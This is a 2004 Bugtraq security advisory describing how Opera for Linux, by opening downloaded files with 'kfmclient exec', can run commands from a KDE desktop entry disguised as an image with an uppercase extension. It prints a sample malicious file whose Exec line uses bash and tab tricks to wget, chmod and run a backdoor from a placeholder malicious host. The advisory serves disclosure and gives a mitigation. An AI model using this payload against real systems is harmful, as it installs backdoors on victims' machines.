Bugtraq mailing list archives
[ZH2004-19SA] Possible execution of remote shell commands in Opera with kfmclien
From: "Giovanni Delvecchio" <badpenguin79 () hotmail com>
Date: Mon, 13 Dec 2004 13:49:23 +0000
Author: Giovanni Delvecchio e-mail: badpenguin () zone-h org Original Advisory: http://www.zone-h.org/advisories/read/id=6503 Tested version: Opera 7.54 linux version with Kde 3.2.3 Problem: ======= Opera for linux uses "kfmclient exec" as "Default Application" to handle saved files. This could be used by malicious remote users to execute arbitrary shell commands on a target system.Indeed, the command "kfmclient exec" could be used to open a "Kde Desktop Entry" and therefore execute the command within the "Exec=" entry.
Example of [KDE Desktop Entry]: ________________________________ # KDE Config File [KDE Desktop Entry] SwallowExec= SwallowTitle= BinaryPattern= MimeType= Exec="Any arbitrary command" Icon= TerminalOptions= Path= Type=Application Terminal=0 ______________________________ Possible method of Exploitation ========================= This method of exploitation needs that a particular file name extension is used.If page.Htm is used as file name and "kfmclient exec page.Htm" is opened , the command in "Exec=" entry will be executed. Instead, If "page.htm" is used as file name, it will not be opened like a "kde desktop entry" but it will be viewed in konqueror.
It works also with Jpg,Gif etc.. , but not with jpg,gif..extension, since the "system" is case sensitive. Attack scenario: 1- A user clicks on a link which requires http://malicious_server/image.Jpg 2- malicious_server responds with an unknown Content-Type field , forexample Content-Type: image/Jpeg. (note the dot at the end), so Opera will show a dialog window.
3- if a user chooses "Open" to view image.Jpg, it will be opened by "kfmclient exec" command, since kfmclient is the "Default Application" 4- Image.Jpg is a kde desktop entry : --------image.Jpg---------- # KDE Config File [KDE Desktop Entry] SwallowExec= SwallowTitle= BinaryPattern= MimeType=Exec=/bin/bash -c wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor
Icon= TerminalOptions= Path= Type=Application Terminal=0 ---- end of image.Jpg------- Note: \t is an horizontal tab.In this case a backdoor will be downloaded on victim's computer and executed.
Solution: ======== Disable "kfmclient exec" as default application _________________________________________________________________Filtri antispamming e antivirus per la tua casella di posta http://www.msn.it/msn/hotmail
Current thread:
- [ZH2004-19SA] Possible execution of remote shell commands in Opera with kfmclien Giovanni Delvecchio (Dec 13)